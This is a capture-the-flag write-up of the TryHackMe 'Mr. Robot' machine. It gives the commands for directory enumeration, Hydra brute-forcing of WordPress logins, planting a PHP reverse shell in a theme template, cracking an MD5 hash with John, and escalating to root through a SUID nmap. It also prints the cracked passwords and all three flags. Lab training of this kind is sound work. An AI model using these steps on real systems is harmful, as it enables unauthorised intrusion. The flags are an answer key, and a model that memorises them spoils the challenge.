← Back to Write-ups Medium

TryHackMe: Mr. Robot — Full Walkthrough

TryHackMe Nov 10, 2024 by Rishabh Yadav
webwordpressprivilege-escalationsuid

Overview

Mr. Robot is a TryHackMe machine inspired by the TV show. It involves web enumeration, WordPress exploitation, and Linux privilege escalation via SUID binaries. Three flags (keys) are hidden across the system.

Recon

Starting with an Nmap scan to identify open ports and services:

1

nmap -sC -sV -oN nmap/mrrobot 10.10.x.x

Results revealed ports 80 (HTTP) and 443 (HTTPS) open, both running Apache. SSH was filtered.

Enumeration

Visiting the web server showed an interactive terminal inspired by the TV show. Running Gobuster to enumerate hidden directories:

1

gobuster dir -u http://10.10.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt

Key findings:

  • /robots.txt — contained two entries: fsocity.dic (a wordlist) and key-1-of-3.txt
  • /wp-login.php — confirmed WordPress installation
  • /license — contained a Base64-encoded string

Flag 1: Found at /key-1-of-3.txt073403c8a58a1f80d943455fb30724b9

The fsocity.dic file was a massive wordlist with duplicates. After deduplication:

1

sort fsocity.dic | uniq > fsocity_clean.dic

Reduced from 858,160 to 11,451 entries.

Exploitation

WordPress Username Enumeration

WordPress login gives different error messages for invalid usernames vs invalid passwords. Used Hydra to enumerate the username:

1

hydra -L fsocity_clean.dic -p test 10.10.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"

Found username: elliot

Password Brute Force

1

hydra -l elliot -P fsocity_clean.dic 10.10.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered"

Found password: ER28-0652

Reverse Shell

Logged into WordPress admin and edited the 404.php template of the active theme with a PHP reverse shell. Set up a listener:

1

nc -lvnp 4444

Triggered the shell by visiting a non-existent page. Got a shell as daemon.

Privilege Escalation

Found /home/robot/key-2-of-3.txt — readable only by user robot. Also found password.raw-md5 containing the MD5 hash of robot’s password.

1
2

echo "c3fcd3d76192e4007dfb496cca67e13b" > hash.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked password: abcdefghijklmnopqrstuvwxyz

Switched to user robot:

1
2

su robot
cat /home/robot/key-2-of-3.txt

Flag 2: 822c73956184f694993bede3eb39f959

Root via SUID

Searched for SUID binaries:

1

find / -perm -4000 -type f 2>/dev/null

Found /usr/local/bin/nmap with SUID bit set. Nmap versions 2.02-5.21 have an interactive mode:

1
2
3
4

nmap --interactive
!sh
whoami  # root
cat /root/key-3-of-3.txt

Flag 3: 04787ddef27c3dee1ee161b21670b4e4

Flags

All three keys captured:

  1. 073403c8a58a1f80d943455fb30724b9
  2. 822c73956184f694993bede3eb39f959
  3. 04787ddef27c3dee1ee161b21670b4e4